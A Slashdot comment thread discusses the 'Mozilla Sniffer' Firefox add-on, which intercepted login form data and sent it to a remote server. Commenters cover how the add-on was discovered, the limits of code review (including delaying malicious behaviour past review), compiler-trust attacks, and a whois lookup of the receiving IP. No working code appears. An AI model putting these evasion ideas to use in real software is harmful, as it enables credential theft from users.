How the Mozilla Sniffer Backdoor Was Discovered 201
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
Informative article (Score:4, Informative)
Re:Informative article (Score:1, Informative)
RTFT.
Re:Informative article (Score:5, Informative)
An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.
Re:It was bound to happen eventually.. (Score:5, Informative)
Nothing in that process would detect any but the most blatantly unsubtle malice(and, given that reviews tend to occur fairly quickly, something as simple as recording the date of first run, and not doing anything evil until 1 month has passed would probably count as "subtle" for the purposes of this exercise).
If malice is detected by a third party, or by some after-the-fact spot-check; both Apple and Android have practically identical capabilities to "unpublish and remove" an application from any device that hasn't been divorced from the mothership. For that matter, Mozilla can also issue FF updates that disable add-ons(as they did a while back for that MS
Re:Native features in browser (Score:4, Informative)
>And since Opera is not open source, there is no way to be sure of that.
Sure there is, you can reverse-engineer it to see what it does. You know, just because all you have is the binary doesn't mean you've suddenly entered a magic land where nothing can be understood.
(I'm going to ignore "but can you trust your tools" asshatery)
It was experimental, warnings were there (Score:5, Informative)
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
Re:Native features in browser (Score:3, Informative)
Unless you go through all the code yourself, there's no way to be sure of anything.
you mean unless you go through the code, compile it yourself using a compiler whose code you've also audited and itself was not compiled by an unaudited compiler [bell-labs.com]
Re:Native features in browser (Score:5, Informative)
No, I've seen it. I used to have a pretty decent email pen-pal thing going on with Ken about 10 years ago. He's a pretty cool dude. The point is, yes, even if you see the code, unless you have the code to the compiler and build it yourself, then you can't trust the binary. Basically, you can't trust anything you don't create from scratch. There could also be back-doors in ROM in the hardware. Which is why I go on to say how even if you do your own audit you can't actually trust anything. Either you won't understand everything, you'll have taken in too much information and miss something vital or,as per your example, the real root of the problem will be so obscured from view that it doesn't even matter what you're auditing.
Re:Advertised purpose? (Score:5, Informative)
In addition to modifying several existing files, the author added a file called tamperPost.js that very deliberately sends every form submission to a remote server. You can see some of the code of this on the Netcraft article in the summary (or or a direct link to the image [netcraft.com])
When you see the image, you can see that it was obviously a deliberate attempt to steal credentials.
Re:Native features in browser (Score:2, Informative)
Source is ok ... but can you trust your compiler [scienceblogs.com]?
Re:Informative article (Score:3, Informative)
maybe Dillo? (Score:3, Informative)
You could try Dillo [wikipedia.org].
Re:Native features in browser (Score:4, Informative)
Jon: This is great, good work.
Jane: Clean and efficient, great addon.
*Create account: Jack*
Jack: Yeah, awesome stuff! Jim, Jon, and Jane are all correct.
*Create account: James*
James: I love this addon! No viruses here
Re:Native features in browser (Score:4, Informative)
In case you're a beta user: Tree Style Tabs says it's 4.0b1-compatible; TabGroups Manager doesn't but works apart from a cosmetic issue (the tab group bar appears below the tab bar instead of above it).
Re:Native features in browser (Score:3, Informative)
74.220.219.77/~beverlz5 (Score:3, Informative)
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?